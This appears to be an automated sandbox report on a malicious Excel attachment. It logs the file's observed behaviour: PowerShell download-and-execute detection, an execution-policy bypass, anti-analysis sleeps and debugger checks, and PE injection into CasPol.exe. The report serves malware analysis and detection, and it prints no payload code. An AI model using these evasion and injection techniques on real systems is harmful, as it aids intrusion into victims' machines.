Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'MBD014C1E4D/Package' entropy: 7.94807170977 (max. 8.0)
Source: A & C Metrology OC 545714677889Materiale.xls	Stream path 'Workbook' entropy: 7.99929899945 (max. 8.0)
Source: 7B130000.0.dr	Stream path 'Workbook' entropy: 7.99922606033 (max. 8.0)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

31_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1996	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5118	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2831	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3784	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 621	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1614	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1707	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8140	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 884
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1181
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1719
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 697
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1612
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8157
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 9700

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\revod450\revod450.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll			Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\mshta.exe TID: 3740	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3964	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 2831 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996	Thread sleep count: 3784 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4036	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep count: 621 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976	Thread sleep count: 1614 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1884	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 1707 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep count: 8140 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1888	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\mshta.exe TID: 2432	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408	Thread sleep count: 884 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1408	Thread sleep count: 1181 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1660	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520	Thread sleep count: 1470 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3516	Thread sleep count: 1719 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1652	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3560	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720	Thread sleep count: 697 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032	Thread sleep count: 333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040	Thread sleep count: 1612 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616	Thread sleep count: 8157 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224	Thread sleep time: -4200000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep count: 272 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep time: -816000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2960	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep count: 9700 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2900	Thread sleep time: -29100000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1080	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 3528	Thread sleep time: -120000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,	31_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	41_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	42_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_00418981 memset,GetSystemInfo,

31_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

31_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 31_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

31_2_004044A4

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTR

Bypasses PowerShell execution policy

Source: C:\Windows\System32\wscript.exe

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: NULL target: unknown protection: execute and read and write

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 471000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 477000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 479000	Jump to behavior
